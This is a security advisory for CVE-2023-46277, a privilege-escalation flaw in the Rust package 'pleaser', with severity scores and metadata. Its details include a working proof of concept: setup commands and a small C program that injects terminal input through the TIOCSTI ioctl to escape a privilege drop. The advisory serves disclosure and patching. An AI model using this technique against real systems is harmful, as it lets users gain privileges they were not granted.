CVE-2023-46277 – pleaser

Package

Manager: cargo
Name: pleaser
Vulnerable Version: >=0 <=0.5.4

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00059 pctl0.18561

Details

Pleaser privilege escalation vulnerability please (aka pleaser) through 0.5.4 allows privilege escalation through the TIOCSTI and/or TIOCLINUX ioctl. (If both TIOCSTI and TIOCLINUX are disabled, this cannot be exploited.) Here is how to see it in action: ``` $ cd "$(mktemp -d)" $ git clone --depth 1 https://gitlab.com/edneville/please.git $ cd please/ $ git rev-parse HEAD # f3598f8fae5455a8ecf22afca19eaba7be5053c9 $ cargo test && cargo build --release $ echo "[${USER}_as_nobody]"$'\nname='"${USER}"$'\ntarget=nobody\nrule=.*\nrequire_pass=false' | sudo tee /etc/please.ini $ sudo chown root:root ./target/release/please $ sudo chmod u+s ./target/release/please $ cat <<TIOCSTI_C_EOF | tee TIOCSTI.c #include <sys/ioctl.h> int main(void) { const char *text = "id\n"; while (*text) ioctl(0, TIOCSTI, text++); return 0; } TIOCSTI_C_EOF $ gcc -std=c99 -Wall -Wextra -pedantic -o /tmp/TIOCSTI TIOCSTI.c $ ./target/release/please -u nobody /tmp/TIOCSTI # runs id(1) as ${USER} rather than nobody ``` Please note that: This affects both the case where root wants to drop privileges as well when non-root wants to gain other privileges.

Metadata

Created: 2023-10-20T06:30:19Z
Modified: 2024-09-12T18:41:42Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-cgf8-h3fp-h956/GHSA-cgf8-h3fp-h956.json
CWE IDs: ["CWE-269"]
Alternative ID: GHSA-cgf8-h3fp-h956
Finding: F159
Auto approve: 1